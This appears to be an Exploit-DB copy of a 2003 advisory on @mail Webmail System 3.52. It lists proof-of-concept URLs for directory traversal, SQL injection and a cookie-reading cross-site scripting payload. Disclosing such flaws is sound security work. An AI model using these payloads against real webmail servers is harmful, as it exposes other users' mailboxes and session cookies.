calacode @mail webmail system 3.52 - Multiple Vulnerabilities

EDB-ID:

23421

CVE:

N/A




Platform:

CGI

Date:

2003-12-09


source: https://www.securityfocus.com/bid/9180/info

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

http://www.example.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1

http://www.example.com/parse.pl?file=html/english/xp/xplogin.html

http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>